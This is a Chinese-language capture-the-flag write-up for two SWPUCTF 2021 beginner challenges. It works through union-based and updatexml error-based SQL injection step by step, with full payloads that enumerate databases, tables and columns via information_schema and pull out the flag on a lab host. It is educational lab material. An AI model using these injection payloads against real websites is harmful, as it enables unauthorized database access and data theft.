[SWPUCTF 2021 新生赛]easy_sql

参数是wllm

这里直接‘ or 1 = 1 --+ 虽然返回了但没用

通过’ order by 1 --+判断字段发现order by 4时报错得到有3个字段

通过‘ union select 1,2,3 --+ 发现2 ，3会显示在页面上

通过‘ union select 1,database(),3 --+ 查询当前数据库库名得到库名为test_db

通过‘ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+

group_concat 用于将查询的tables_name中所以的数据合成一个字符串

information_schema_tables 数据库中存放元数据的地方

tables_schema=database() 用于指定查询表的数据库这里代表查询当前数据库的表

这整个命令用于查询当前数据库中所有的表名

得到test_tb和users两个表

'union select 1,(select group_concat(column_name)from information_schema.columns where table_name='test_tb'),3 --+
group_concat(column_name)把查询到的列名组合成一个字符串

information_schema.columns从information_schema.columns表中查询

table_name='test_tb' 同时指定表的名称为test_tb

得到flag字段

通过'union select 1,(select flag from test_tb),3 --+得到flag

[SWPUCTF 2021 新生赛]error

这里时报错注入，报错注入常在页面没有回显，但是会出现报错信息时使用

我们通过updatexml来修改xml类的数据，这时候我们如果指定错误的节点路径updatexml会返回错误信息，就会造成报错注入

updatexml（1，2，3）中有3个可以修改的值

1中代表要更新的xml类我们常指定错误的类让他报错

2中代表xpath表达式也就是我们要构造的恶意代码

3中代表要更新的值

id=' and updatexml(1,concat(0x7e,(select database()),0x7e),3) --+

concat用于将查询的数据合成一个字符串 0x7e是~ 因为这里在xpath中的参数一定要’‘或者“”进行引用但是这里如果用’‘会导致语句变成字符串所以要通过0x7e的~代替’‘

得到test_db其他的上面的差不多

查询当前库发现数据过多

我们使用limit 他有两个参数第一个代表偏移量第二个限制量

偏离量代表从第几条开始查询限制量代表查询几条

http://node2.anna.nssctf.cn:28028/index.php?id=' and updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),3) --+通过查询得到了表为tes_db

查询列名

http://node2.anna.nssctf.cn:28028/index.php?id=' and updatexml(1,concat(0x7e,(select (column_name) from information_schema.columns where table_name='test_tb' limit 0,1),0x7e),3) --+通过查询得到id 修改偏移量